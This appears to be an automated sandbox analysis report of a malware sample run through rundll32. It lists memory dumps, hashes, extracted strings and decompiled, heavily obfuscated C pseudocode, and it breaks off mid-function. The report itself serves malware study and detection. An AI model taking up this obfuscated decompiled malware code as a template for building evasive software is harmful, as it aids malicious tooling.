Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8y$@<$Vx$Y'}A$\m$a_$b[31$(
API String ID: 0-4115005019
Opcode ID: d64eb05014167151f55bfd677ce68e833626c0260b1ae9b0fa28e127969d29f5
Instruction ID: 3a39db6b6f8d03e4f24a9fd6b2567837f4b1b2527e4d7ee8595cc4e0db269aeb
Opcode Fuzzy Hash: d64eb05014167151f55bfd677ce68e833626c0260b1ae9b0fa28e127969d29f5
Instruction Fuzzy Hash: 96B10F715083409FE318CF25C98A90BFBF2BBC5748F10891EF199962A1D7B9DA498F46

Uniqueness

Uniqueness Score: -1.00%

Function 002A84D9, Relevance: 10.2, Strings: 8, Instructions: 246COMMON

Download Yara Rule

Strings

8y, xrefs: 002A8618
\m, xrefs: 002A85A7
Vx, xrefs: 002A87F5
b[31, xrefs: 002A85C7
Y'}A, xrefs: 002A850D
@<, xrefs: 002A8749
a_, xrefs: 002A8579
(, xrefs: 002A8719

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8y$@<$Vx$Y'}A$\m$a_$b[31$(
API String ID: 0-4115005019
Opcode ID: bf2b65d077145c1e946a4d50cbd20d5c91f358d91982701b99b9c740b412cfc1
Instruction ID: ff6b5a75e0c9716fd275aa8fe43cb465ec77f33a89b38114d86a7e5304be357c
Opcode Fuzzy Hash: bf2b65d077145c1e946a4d50cbd20d5c91f358d91982701b99b9c740b412cfc1
Instruction Fuzzy Hash: 00B10E715083409FE358CF25C98A90BFBE2BBC5748F108A1DF189962A0DBB9D9498F47

Uniqueness

Uniqueness Score: -1.00%

Function 001F3D4E, Relevance: 10.2, Strings: 8, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001F3D4E(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t231;
				intOrPtr _t232;
				intOrPtr* _t233;
				intOrPtr* _t236;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				intOrPtr* _t269;
				void* _t270;
				void* _t272;
				signed int* _t273;

				_t273 =  &_v112;
				_v72 = 0x5582;
				_v72 = _v72 >> 1;
				_t272 = __edx;
				_t243 = __ecx;
				_t269 = 0;
				_t245 = 0x51;
				_v72 = _v72 / _t245;
				_v72 = _v72 ^ 0x0000601c;
				_t270 = 0x1322e1ec;
				_v36 = 0xc7c9;
				_v36 = _v36 | 0xbc8756ca;
				_v36 = _v36 ^ 0xbc8791da;
				_v56 = 0xdb25;
				_v56 = _v56 + 0xa75d;
				_v56 = _v56 ^ 0x0001a8e8;
				_v112 = 0xc6db;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 + 0xd338;
				_v112 = _v112 ^ 0x0000d633;
				_v76 = 0xc37;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xce4966ab;
				_v76 = _v76 ^ 0xce4936b0;
				_v108 = 0xb399;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 1;
				_v108 = _v108 | 0x0148f084;
				_v108 = _v108 ^ 0x59ccb068;
				_v80 = 0xaa79;
				_v80 = _v80 + 0x2a7d;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x0000706a;
				_v52 = 0x1cb3;
				_v52 = _v52 | 0xdfdf2f63;
				_v52 = _v52 ^ 0xdfdf2d78;
				_v40 = 0x2796;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x004f7581;
				_v44 = 0x2f1a;
				_t246 = 0x64;
				_v44 = _v44 / _t246;
				_v44 = _v44 ^ 0x0000485d;
				_v48 = 0x187a;
				_v48 = _v48 + 0x126d;
				_v48 = _v48 ^ 0x000074b0;
				_v104 = 0x9317;
				_v104 = _v104 >> 8;
				_v104 = _v104 << 5;
				_v104 = _v104 + 0xe504;
				_v104 = _v104 ^ 0x0000e32e;
				_v100 = 0xf551;
				_v100 = _v100 ^ 0x5a167e7d;
				_v100 = _v100 >> 7;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 ^ 0x00000292;
				_v28 = 0x87ec;
				_v28 = _v28 + 0xffffd24f;
				_v28 = _v28 ^ 0x00002fae;
				_v32 = 0x1a62;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x000d761f;
				_v68 = 0x4d45;
				_v68 = _v68 + 0xffff90af;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fff89e8;
				_v12 = 0x8a80;
				_v12 = _v12 | 0x7f7c99ee;
				_v12 = _v12 ^ 0x7f7cab2a;
				_v16 = 0x19cc;
				_v16 = _v16 + 0xffff6b5c;
				_v16 = _v16 ^ 0xfffffdf7;
				_v20 = 0x88ed;
				_v20 = _v20 | 0x3d0cae91;
				_v20 = _v20 ^ 0x3d0caeb7;
				_v24 = 0xdb7;
				_v24 = _v24 + 0xffffd9aa;
				_v24 = _v24 ^ 0xffffae78;
				_v96 = 0xd89d;
				_v96 = _v96 ^ 0x4d812d2a;
				_v96 = _v96 << 0xd;
				_v96 = _v96 << 2;
				_v96 = _v96 ^ 0xfadb9b11;
				_v60 = 0x63dc;
				_t247 = 0x73;
				_v60 = _v60 * 0x5f;
				_v60 = _v60 ^ 0x00257e00;
				_v64 = 0xaca0;
				_v64 = _v64 + 0x1639;
				_v64 = _v64 ^ 0x0000d793;
				_v84 = 0x1d64;
				_v84 = _v84 * 0x49;
				_v84 = _v84 + 0x2f18;
				_v84 = _v84 ^ 0x0008f6d2;
				_v4 = 0xa1b0;
				_v4 = _v4 + 0xca2d;
				_v4 = _v4 ^ 0x000177a9;
				_v88 = 0xa1e4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 + 0x87da;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x0043e3cc;
				_v8 = 0x4904;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x001263b3;
				_v92 = 0x6a47;
				_v92 = _v92 + 0xffffd61f;
				_v92 = _v92 + 0xffffa4a6;
				_v92 = _v92 / _t247;
				_v92 = _v92 ^ 0x02399718;
				while(1) {
					L1:
					_t231 = 0xbbd3b0e;
					do {
						L2:
						while(_t270 != _t231) {
							if(_t270 == 0x11fd89d0) {
								_t247 = _v100;
								_t233 = E001F8997(_t247, _v28, _v32, _v68,  *_t269);
								_t273 =  &(_t273[3]);
								 *((intOrPtr*)(_t269 + 0x1c)) = _t233;
								__eflags = _t233;
								_t231 = 0xbbd3b0e;
								_t270 =  !=  ? 0xbbd3b0e : 0x2e937f96;
								continue;
							}
							if(_t270 != 0x1322e1ec) {
								if(_t270 == 0x17e19405) {
									return E001F91CD(_v4, _v88, _v8, _t269, _v92);
								}
								if(_t270 == 0x25daab44) {
									 *((intOrPtr*)(_t269 + 0x20)) = _t243;
									_t238 =  *0x211400; // 0x0
									 *((intOrPtr*)(_t269 + 0x10)) = _t238;
									 *0x211400 = _t269;
									return _t238;
								}
								if(_t270 == 0x29623426) {
									_push(_v112);
									_t239 = E001F5BE1(_v56, _t272, __eflags, _t247);
									 *_t269 = _t239;
									_pop(_t247);
									__eflags = _t239;
									if(__eflags == 0) {
										goto L10;
									} else {
										E001F39D1(_v108, _v80,  *_t269, _v52, _t239);
										_t247 = _v40;
										E001F56B3(_v44, _v48,  *_t269, _v104);
										_t273 =  &(_t273[7]);
										_t270 = 0x11fd89d0;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
									goto L13;
								} else {
									if(_t270 != 0x2e937f96) {
										goto L19;
									} else {
										E00208C8B(_v60, _v64, _v84,  *_t269);
										_pop(_t247);
										L10:
										_t270 = 0x17e19405;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
								}
								L23:
								return _t236;
							}
							L13:
							_t248 = 0x24;
							_t236 = E002057E8(_t248);
							_t269 = _t236;
							_t247 = _t247;
							__eflags = _t269;
							if(__eflags != 0) {
								_t270 = 0x29623426;
								while(1) {
									L1:
									_t231 = 0xbbd3b0e;
									goto L2;
								}
							}
							goto L23;
						}
						_t247 = _v12;
						_t232 = E001FD6D8(_t247, _v16, _t247, E001F8816, _v20, _t247, _t269, _t247, _t247, _v24, _v96);
						_t273 =  &(_t273[9]);
						 *((intOrPtr*)(_t269 + 4)) = _t232;
						__eflags = _t232;
						if(__eflags == 0) {
							_t270 = 0x2e937f96;
							_t231 = 0xbbd3b0e;
							goto L19;
						} else {
							_t270 = 0x25daab44;
							goto L1;
						}
						goto L23;
						L19:
						__eflags = _t270 - 0x32655ae2;
					} while (__eflags != 0);
					return _t231;
				}
			}

0x001f3d4e
0x001f3d51
0x001f3d59
0x001f3d65
0x001f3d67
0x001f3d6d
0x001f3d6f
0x001f3d74
0x001f3d7a
0x001f3d82
0x001f3d87
0x001f3d8f
0x001f3d97
0x001f3d9f
0x001f3da7
0x001f3daf
0x001f3db7
0x001f3dbf
0x001f3dc4
0x001f3dc9
0x001f3dd1
0x001f3dd9
0x001f3de1
0x001f3de6
0x001f3dee
0x001f3df6
0x001f3dfe
0x001f3e03
0x001f3e07
0x001f3e0f
0x001f3e17
0x001f3e1f
0x001f3e27
0x001f3e2c
0x001f3e34
0x001f3e3c
0x001f3e44
0x001f3e4c
0x001f3e54
0x001f3e59
0x001f3e61
0x001f3e6d
0x001f3e70
0x001f3e74
0x001f3e7c
0x001f3e84
0x001f3e8c
0x001f3e94
0x001f3e9c
0x001f3ea1
0x001f3ea6
0x001f3eae
0x001f3eb6
0x001f3ebe
0x001f3ec6
0x001f3ecb
0x001f3ed0
0x001f3ed8
0x001f3ee0
0x001f3ee8
0x001f3ef0
0x001f3ef8
0x001f3efd
0x001f3f05
0x001f3f0d
0x001f3f15
0x001f3f1a
0x001f3f22
0x001f3f2a
0x001f3f32
0x001f3f3a
0x001f3f44
0x001f3f4c
0x001f3f54
0x001f3f5c
0x001f3f64
0x001f3f6c
0x001f3f74
0x001f3f7c
0x001f3f84
0x001f3f8c
0x001f3f94
0x001f3f99
0x001f3f9e
0x001f3fa6
0x001f3fb5
0x001f3fb6
0x001f3fba
0x001f3fc2
0x001f3fca
0x001f3fd2
0x001f3fda
0x001f3fe7
0x001f3feb
0x001f3ff3
0x001f3ffb
0x001f4003
0x001f400b
0x001f4013
0x001f401b
0x001f4020
0x001f4028
0x001f402d
0x001f4035
0x001f403d
0x001f4042
0x001f404a
0x001f4052
0x001f405a
0x001f4068
0x001f406c
0x001f4074
0x001f4074
0x001f4074
0x001f4079
0x00000000
0x001f4079
0x001f4087
0x001f4169
0x001f416d
0x001f4172
0x001f4175
0x001f4178
0x001f417f
0x001f4184
0x00000000
0x001f4184
0x001f4093
0x001f409f
0x00000000
0x001f4213
0x001f40ab
0x001f41e4
0x001f41e7
0x001f41ec
0x001f41ef
0x00000000
0x001f41ef
0x001f40b7
0x001f40e1
0x001f40ec
0x001f40f1
0x001f40f4
0x001f40f5
0x001f40f7
0x00000000
0x001f40f9
0x001f410c
0x001f411f
0x001f4123
0x001f4128
0x001f412b
0x001f4074
0x001f4074
0x001f4074
0x00000000
0x001f4074
0x001f4074
0x00000000
0x001f40b9
0x001f40bf
0x00000000
0x001f40c5
0x001f40d3
0x001f40d9
0x001f40da
0x001f40da
0x001f4074
0x001f4074
0x001f4074
0x00000000
0x001f4074
0x001f4074
0x001f40bf
0x001f421d
0x001f421d
0x001f421d
0x001f4135
0x001f4140
0x001f4141
0x001f4146
0x001f4148
0x001f4149
0x001f414b
0x001f4151
0x001f4074
0x001f4074
0x001f4074
0x00000000
0x001f4074
0x001f4074
0x00000000
0x001f414b
0x001f41ac
0x001f41b3
0x001f41b8
0x001f41bb
0x001f41be
0x001f41c0
0x001f41cc
0x001f41d1
0x00000000
0x001f41c2
0x001f41c2
0x00000000
0x001f41c2
0x00000000
0x001f41d6
0x001f41d6
0x001f41d6
0x00000000
0x001f4079

Strings

&4b), xrefs: 001F40B1
&4b), xrefs: 001F4151
EM, xrefs: 001F3F05
Ze2, xrefs: 001F41D6
jp, xrefs: 001F3E2C
Gj, xrefs: 001F404A
., xrefs: 001F3EAE
]H, xrefs: 001F3E74

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &4b)$&4b)$.$EM$Gj$]H$jp$Ze2
API String ID: 0-3831357560
Opcode ID: d23a70839516c7bb249a4dc2c40618149c19fac165d8d5e4621199eff8d9b715
Instruction ID: 8824a8e80e3bdda1019f1ad134fa146ce9ed473ea5354a27c54ec02c64b537b4
Opcode Fuzzy Hash: d23a70839516c7bb249a4dc2c40618149c19fac165d8d5e4621199eff8d9b715
Instruction Fuzzy Hash: 55C1317250C3419FE368CF21C48945BBBE1BB94758F204A1DF695962A0D7B9C958CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002932C2, Relevance: 10.2, Strings: 8, Instructions: 245COMMON

Download Yara Rule

Strings

Gj, xrefs: 002935BE
&4b), xrefs: 00293625
jp, xrefs: 002933A0
]H, xrefs: 002933E8
., xrefs: 00293422
EM, xrefs: 00293479
&4b), xrefs: 002936C5
Ze2, xrefs: 0029374A

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &4b)$&4b)$.$EM$Gj$]H$jp$Ze2
API String ID: 0-3831357560
Opcode ID: 19ee3fe668e38962983588c49a8934322be4706a49743221cd18c73d45d6a731
Instruction ID: b856790a713699571761b9fc8792ff0480655b21f534f019a94db3bdf2b06b7e
Opcode Fuzzy Hash: 19ee3fe668e38962983588c49a8934322be4706a49743221cd18c73d45d6a731
Instruction Fuzzy Hash: 01C153B25083419FE754CF21C48944BFBF1BB94758F204A1DF599962A0D7B5CA58CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00299DAE, Relevance: 10.2, Strings: 8, Instructions: 209COMMON

Download Yara Rule

Strings

zC, xrefs: 00299E54
yv, xrefs: 00299FB9
tR, xrefs: 00299EC4
:Z, xrefs: 00299EDA
x(, xrefs: 00299F48
7,, xrefs: 00299F12
h, xrefs: 00299F64
Z, xrefs: 00299DF0

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 7,$:Z$Z$tR$x($yv$zC$h
API String ID: 0-2636882195
Opcode ID: acf463ddc74f1907da47cc1bf2fa0c7e97a2c4fdea8e7220da2c6ba63da527d0
Instruction ID: 2b1fa7d5a1b4696c44c5494fec9b92141a16c0fee34845c54cfbec7f283bae8f
Opcode Fuzzy Hash: acf463ddc74f1907da47cc1bf2fa0c7e97a2c4fdea8e7220da2c6ba63da527d0
Instruction Fuzzy Hash: 0AA133B1D00209EBDF18CFA9D88A9EEFBB1FF44318F208119E415B6260D7B95A55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001F704B, Relevance: 10.2, Strings: 8, Instructions: 208
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001F704B() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t185;
				void* _t186;
				signed int _t187;
				void* _t193;
				void* _t213;
				void* _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr* _t226;
				signed int _t227;
				signed int* _t228;

				_t228 =  &_v68;
				_v60 = 0x1d43;
				_v60 = _v60 << 0xc;
				_t193 = 0x3977c092;
				_v60 = _v60 + 0x28c6;
				_v60 = _v60 ^ 0xdcba1064;
				_v60 = _v60 ^ 0xdd6f48a2;
				_v20 = 0xe9e;
				_v20 = _v20 | 0x1058ed95;
				_v20 = _v20 ^ 0x210197a0;
				_v20 = _v20 ^ 0x31590bf2;
				_v24 = 0x25e5;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x00002580;
				_v28 = 0x30bc;
				_v28 = _v28 | 0xe7a908b3;
				_v28 = _v28 * 0x23;
				_t218 = 0;
				_v28 = _v28 ^ 0xac22ac2a;
				_v56 = 0xe775;
				_v56 = _v56 >> 5;
				_v56 = _v56 + 0x1b94;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0x0008bd00;
				_v32 = 0xff32;
				_v32 = _v32 >> 2;
				_v32 = _v32 | 0xd7112a41;
				_v32 = _v32 ^ 0xd7116591;
				_v64 = 0x688b;
				_v64 = _v64 + 0xadbd;
				_v64 = _v64 + 0x2af1;
				_v64 = _v64 + 0xffffcd5d;
				_v64 = _v64 ^ 0x00013bdf;
				_v68 = 0xd7fc;
				_v68 = _v68 | 0x40cef50a;
				_v68 = _v68 >> 2;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x0677a26b;
				_v4 = 0x4a94;
				_v4 = _v4 + 0xffffb7ad;
				_v4 = _v4 ^ 0x00004a42;
				_v8 = 0xf2c8;
				_t219 = 0x70;
				_v8 = _v8 / _t219;
				_v8 = _v8 ^ 0x000043de;
				_v36 = 0x586c;
				_t220 = 0x3c;
				_v36 = _v36 / _t220;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005cc4;
				_v12 = 0x23ea;
				_v12 = _v12 + 0x3510;
				_v12 = _v12 ^ 0x00007e07;
				_v40 = 0xa101;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0x4a49;
				_t221 = 0x14;
				_v40 = _v40 * 0xc;
				_v40 = _v40 ^ 0xf184ff7e;
				_v44 = 0xbfff;
				_v44 = _v44 | 0x69fcb387;
				_v44 = _v44 * 0x2d;
				_v44 = _v44 / _t221;
				_v44 = _v44 ^ 0x081251c3;
				_v48 = 0xf126;
				_t222 = 0x18;
				_v48 = _v48 / _t222;
				_v48 = _v48 << 1;
				_t223 = 0x4c;
				_t227 = _v4;
				_v48 = _v48 / _t223;
				_v48 = _v48 ^ 0x00005fbf;
				_t192 = _v4;
				_t224 = _v4;
				_v16 = 0x73ee;
				_v16 = _v16 << 0xc;
				_v16 = _v16 * 0x45;
				_v16 = _v16 ^ 0xf3f273d0;
				_v52 = 0x98da;
				_v52 = _v52 | 0x54ea2f47;
				_v52 = _v52 + 0xc0b4;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0xd70e263f;
				while(1) {
					L1:
					_t213 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t193 != 0x1e3c7a) {
								if(_t193 == 0x1cae070b) {
									_t187 = E00207C1D(_v28, _v56, _t192, _t224, _v60, _v32);
									_t228 =  &(_t228[4]);
									_t227 = _t187;
									_t186 = 0x32ab8bb4;
									_t193 =  !=  ? 0x32ab8bb4 : 0x242cd2c8;
									_t213 = 0x5c;
									continue;
								} else {
									if(_t193 == 0x242cd2c8) {
										E0020F23C(_v40, _t192, _v44, _v48, _v16);
									} else {
										if(_t193 == _t186) {
											E00203C8B(_t227, _v64, _v68);
											_t218 =  !=  ? 1 : _t218;
											_t193 = 0x3667c679;
											while(1) {
												L1:
												_t213 = 0x5c;
												goto L2;
											}
										} else {
											if(_t193 == 0x336046fa) {
												_t226 =  *0x2121b0 + 0x10;
												while( *_t226 != _t213) {
													_t226 = _t226 + 2;
												}
												_t224 = _t226 + 2;
												_t193 = 0x1e3c7a;
												goto L2;
											} else {
												if(_t193 == 0x3667c679) {
													E0020F23C(_v4, _t227, _v8, _v36, _v12);
													_t228 =  &(_t228[3]);
													_t193 = 0x242cd2c8;
													while(1) {
														L1:
														_t213 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t193 != 0x3977c092) {
														goto L21;
													} else {
														_t193 = 0x336046fa;
														continue;
													}
												}
											}
										}
									}
								}
								L24:
								return _t218;
							}
							_t185 = E001FDA66(_v52, _t213, _v20, _t193, _v24);
							_t192 = _t185;
							_t228 =  &(_t228[3]);
							if(_t185 == 0) {
								_t193 = 0x2f5bcc41;
								_t186 = 0x32ab8bb4;
								_t213 = 0x5c;
								goto L21;
							} else {
								_t193 = 0x1cae070b;
								goto L1;
							}
							goto L24;
							L21:
						} while (_t193 != 0x2f5bcc41);
						goto L24;
					}
				}
			}

0x001f704b
0x001f704e
0x001f7058
0x001f705d
0x001f7062
0x001f706a
0x001f7072
0x001f707a
0x001f7082
0x001f708a
0x001f7092
0x001f709a
0x001f70a2
0x001f70a7
0x001f70ac
0x001f70b4
0x001f70bc
0x001f70cd
0x001f70d1
0x001f70d3
0x001f70db
0x001f70e3
0x001f70e8
0x001f70f0
0x001f70f5
0x001f70fd
0x001f7105
0x001f710a
0x001f7112
0x001f711a
0x001f7122
0x001f712a
0x001f7132
0x001f713a
0x001f7142
0x001f714a
0x001f7152
0x001f7157
0x001f715c
0x001f7164
0x001f716c
0x001f7174
0x001f717c
0x001f718a
0x001f718f
0x001f7195
0x001f719d
0x001f71a9
0x001f71ae
0x001f71b4
0x001f71b9
0x001f71c1
0x001f71c9
0x001f71d1
0x001f71d9
0x001f71e1
0x001f71e6
0x001f71f3
0x001f71f4
0x001f71f8
0x001f7200
0x001f7208
0x001f7215
0x001f721f
0x001f7225
0x001f722d
0x001f723b
0x001f7240
0x001f7246
0x001f724e
0x001f7251
0x001f7255
0x001f7259
0x001f7261
0x001f7265
0x001f7269
0x001f7271
0x001f727b
0x001f727f
0x001f7287
0x001f728f
0x001f7297
0x001f729f
0x001f72a4
0x001f72ac
0x001f72ac
0x001f72ae
0x001f72af
0x001f72af
0x001f72b4
0x00000000
0x001f72b4
0x001f72c6
0x001f7374
0x001f7379
0x001f737c
0x001f7385
0x001f738a
0x001f738f
0x00000000
0x001f72cc
0x001f72d2
0x001f73e7
0x001f72d8
0x001f72da
0x001f734a
0x001f7355
0x001f7358
0x001f72ac
0x001f72ac
0x001f72ae
0x00000000
0x001f72ae
0x001f72dc
0x001f72e2
0x001f7326
0x001f732e
0x001f732b
0x001f732b
0x001f7333
0x001f7336
0x00000000
0x001f72e4
0x001f72ea
0x001f7311
0x001f7316
0x001f7319
0x001f72ac
0x001f72ac
0x001f72ae
0x001f72af
0x00000000
0x001f72af
0x001f72ec
0x001f72f2
0x00000000
0x001f72f8
0x001f72f8
0x00000000
0x001f72f8
0x001f72f2
0x001f72ea
0x001f72e2
0x001f72da
0x001f72d2
0x001f73ef
0x001f73f8
0x001f73f8
0x001f73a2
0x001f73a7
0x001f73a9
0x001f73ae
0x001f73bc
0x001f73c1
0x001f73c6
0x00000000
0x001f73b0
0x001f73b0
0x00000000
0x001f73b0
0x00000000
0x001f73c7
0x001f73c7
0x00000000
0x001f73d3
0x001f72af

Strings

G/T, xrefs: 001F728F
%, xrefs: 001F709A
IJ, xrefs: 001F71E6
u, xrefs: 001F70DB
s, xrefs: 001F7269
#, xrefs: 001F71C1
lX, xrefs: 001F719D
BJ, xrefs: 001F7174

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BJ$G/T$IJ$lX$u$#$%$s
API String ID: 0-3663283382
Opcode ID: cba0d7e3c7846da3ec296e6502c8f69cbc861767e1c39ed9e7d7ae0b77431348
Instruction ID: 48109e2b109c108c6b745c77d20bffdea02b47c380e4c8159086fc968643632c
Opcode Fuzzy Hash: cba0d7e3c7846da3ec296e6502c8f69cbc861767e1c39ed9e7d7ae0b77431348
Instruction Fuzzy Hash: 9791567150C341ABE358CE25C58942FBBE1BBC4758F108A2DFA86962A0D7B4CA498F47

Uniqueness

Uniqueness Score: -1.00%

Function 002965BF, Relevance: 10.2, Strings: 8, Instructions: 208COMMON

Download Yara Rule

Strings

#, xrefs: 00296735
G/T, xrefs: 00296803
IJ, xrefs: 0029675A
s, xrefs: 002967DD
u, xrefs: 0029664F
%, xrefs: 0029660E
BJ, xrefs: 002966E8
lX, xrefs: 00296711

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BJ$G/T$IJ$lX$u$#$%$s
API String ID: 0-3663283382
Opcode ID: 42bb2523c76755a191278e01324d396959104b51c16e843068a9b89363171d27
Instruction ID: 9f2c1d6e646c66b978a51039bc31b32abbf73da86037c08352baa1a33ccf280c
Opcode Fuzzy Hash: 42bb2523c76755a191278e01324d396959104b51c16e843068a9b89363171d27
Instruction Fuzzy Hash: 139176716183419BE758CF25C88941FBBE1FBC8758F009A2DF586962A0D7B4CA19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 002042E2, Relevance: 10.2, Strings: 8, Instructions: 177
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E002042E2(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				void* __ecx;
				void* _t140;
				signed int _t160;
				void* _t166;
				void* _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t188 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001F56B2(_t140);
				_v584 = 0x92ce;
				_t196 =  &(( &_v612)[5]);
				_v584 = _v584 >> 8;
				_v584 = _v584 >> 5;
				_t166 = 0x97b55c3;
				_v584 = _v584 ^ 0x000049ba;
				_v560 = 0xd753;
				_v560 = _v560 << 0xc;
				_v560 = _v560 ^ 0x0d754d3b;
				_v564 = 0x7345;
				_v564 = _v564 + 0xffffb630;
				_v564 = _v564 ^ 0x0000444d;
				_v580 = 0xc1d6;
				_t189 = 0xd;
				_v580 = _v580 * 0x72;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 ^ 0x00004587;
				_v604 = 0xf114;
				_v604 = _v604 / _t189;
				_v604 = _v604 >> 0xd;
				_t190 = 0x7d;
				_v604 = _v604 * 0x2d;
				_v604 = _v604 ^ 0x00006087;
				_v596 = 0x254a;
				_v596 = _v596 >> 6;
				_v596 = _v596 + 0xffff3bab;
				_v596 = _v596 ^ 0x53fe3558;
				_v596 = _v596 ^ 0xac01675f;
				_v572 = 0x4b54;
				_v572 = _v572 | 0x16c6d02e;
				_v572 = _v572 ^ 0x16c6fd39;
				_v612 = 0xa42e;
				_v612 = _v612 / _t190;
				_v612 = _v612 + 0xffff9850;
				_t191 = 0x17;
				_v612 = _v612 / _t191;
				_v612 = _v612 ^ 0x0b214225;
				_v588 = 0x5e84;
				_t192 = 0x45;
				_v588 = _v588 / _t192;
				_v588 = _v588 + 0xffffd4b8;
				_v588 = _v588 ^ 0xffff9394;
				_v592 = 0x37c6;
				_v592 = _v592 ^ 0xfeb5582a;
				_v592 = _v592 + 0x4179;
				_v592 = _v592 * 0x75;
				_v592 = _v592 ^ 0x690a6987;
				_v576 = 0x500e;
				_v576 = _v576 + 0xffff7079;
				_v576 = _v576 ^ 0xffffa0e4;
				_v568 = 0xf903;
				_v568 = _v568 ^ 0x69a540ca;
				_v568 = _v568 ^ 0x69a5fd2e;
				_v600 = 0x246b;
				_v600 = _v600 >> 0xe;
				_t193 = _v576;
				_v600 = _v600 * 0x3e;
				_v600 = _v600 * 0x59;
				_v600 = _v600 ^ 0x00007c65;
				_v608 = 0x26e8;
				_v608 = _v608 * 0x78;
				_v608 = _v608 >> 9;
				_v608 = _v608 << 7;
				_v608 = _v608 ^ 0x00048f02;
				L1:
				while(_t166 != 0x6d2a7ea) {
					if(_t166 == 0x97b55c3) {
						_t166 = 0x10e2cb79;
						continue;
					}
					if(_t166 != 0x10e2cb79) {
						if(_t166 == 0x184d4ecd) {
